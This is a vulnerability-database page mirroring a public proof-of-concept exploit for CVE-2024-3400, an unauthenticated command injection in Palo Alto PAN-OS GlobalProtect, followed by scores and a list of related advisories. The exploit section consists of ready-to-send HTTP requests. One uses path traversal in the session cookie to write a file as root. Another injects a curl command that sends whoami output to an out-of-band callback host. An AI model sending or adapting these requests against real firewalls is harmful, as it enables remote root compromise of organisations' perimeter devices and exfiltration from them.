Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH4x0r-dz, github.comPACKETSTORM:178099
HistoryApr 17, 2024 - 12:00 a.m.

Palo Alto OS Command Injection

2024-04-1700:00:00
h4x0r-dz, github.com
packetstormsecurity.com
110
cve-2024-3400
palo alto
command injection
unauthorized access
file creation
403 errors
server security

7.4 High

AI Score

Confidence

Low

0.957 High

EPSS

Percentile

99.4%

JSON
`# CVE-2024-3400  
  
CVE-2024-3400 Palo Alto OS Command Injection  
  
  
send this HTTP request:   
  
  
```http  
  
POST /ssl-vpn/hipreport.esp HTTP/1.1  
Host: 127.0.0.1  
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0  
```  
  
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)  
  
  
you will create hellome1337.txt file on the server with root access   
  
now if you try to access the files you should receive 403 insted of 404  
  
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)  
  
### Command Injection  
  
```  
POST /ssl-vpn/hipreport.esp HTTP/1.1  
Host: 127.0.01  
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0  
  
```  
  
  
  
  
More Info :   
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis  
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/  
  
`

Related

githubexploit 31
zdt 3
thn 6
wallarmlab 2
ics 1
cvelist 1
akamaiblog 1
rapid7blog 2
metasploit 1
packetstorm 2
cisa_kev 1
hackread 2
attackerkb 1
nessus 1
paloalto 1
nvd 1
nuclei 1
cve 1
exploitdb 1
trellix 1
githubexploit
githubexploit
Exploit for Command Injection in Paloaltonetworks Pan-Os
2024-04-17 04:58:42
Exploit for Command Injection in Paloaltonetworks Pan-Os
2024-04-17 16:01:20
Exploit for Command Injection in Paloaltonetworks Pan-Os
2024-04-15 03:28:22
zdt
zdt
Palo Alto OS Command Injection Vulnerability
2024-04-17 00:00:00
Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation Exploit
2024-04-21 00:00:00
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution Exploit
2024-04-23 00:00:00
thn
thn
Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack
2024-04-13 08:25:00
Palo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack
2024-04-26 10:18:00
Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack
2024-04-12 08:56:00
wallarmlab
wallarmlab
How to track and stop CVE-2024-3400: Palo Alto Networks API Exploit Causing Critical Infrastructure and Enterprise Epidemics
2024-04-13 21:57:47
Dell Data Breach: Personal Information of 49 Million Customers Compromised due to latest API Abuse
2024-05-20 14:44:06
ics
ics
Siemens RUGGEDCOM APE1808 Devices Configured with Palo Alto Networks Virtual NGFW
2024-04-25 12:00:00
cvelist
cvelist
CVE-2024-3400 PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
2024-04-12 07:20:00
akamaiblog
akamaiblog
RedTail Cryptominer Threat Actors Adopt PAN-OS CVE-2024-3400 Exploit
2024-05-30 14:00:00
rapid7blog
rapid7blog
CVE-2024-3400: Critical Command Injection Vulnerability in Palo Alto Networks Firewalls
2024-04-12 12:59:48
Metasploit Weekly Wrap-Up 04/26/24
2024-04-26 19:49:58
metasploit
metasploit
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
2024-04-17 18:52:50
packetstorm
packetstorm
Palo Alto PAN-OS Command Execution / Arbitrary File Creation
2024-04-23 00:00:00
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
2024-04-23 00:00:00
cisa_kev
cisa_kev
Palo Alto Networks PAN-OS Command Injection Vulnerability
2024-04-12 00:00:00
hackread
hackread
Palo Alto Patches 0-Day (CVE-2024-3400) Exploited by Python Backdoor
2024-04-15 18:29:11
Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)
2024-04-17 16:20:25
attackerkb
attackerkb
CVE-2024-3400
2024-04-12 00:00:00
nessus
nessus
Palo Alto Networks PAN-OS CVE-2024-3400
2024-04-12 00:00:00
paloalto
paloalto
PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
2024-04-12 06:55:00
nvd
nvd
CVE-2024-3400
2024-04-12 08:15:06
nuclei
nuclei
GlobalProtect - OS Command Injection
2024-04-16 15:37:09
cve
cve
CVE-2024-3400
2024-04-12 08:15:06
exploitdb
exploitdb
Palo Alto PAN-OS &lt; v11.1.2-h3 - Command Injection and Arbitrary File Creation
2024-04-21 00:00:00
trellix
trellix
The Bug Report - April 2024 Edition
2024-04-29 00:00:00

7.4 High

AI Score

Confidence

Low

0.957 High

EPSS

Percentile

99.4%

JSON
Related for PACKETSTORM:178099
githubexploit31zdt3thn6wallarmlab2ics1cvelist1akamaiblog1rapid7blog2metasploit1packetstorm2cisa_kev1hackread2attackerkb1nessus1paloalto1nvd1nuclei1cve1exploitdb1trellix1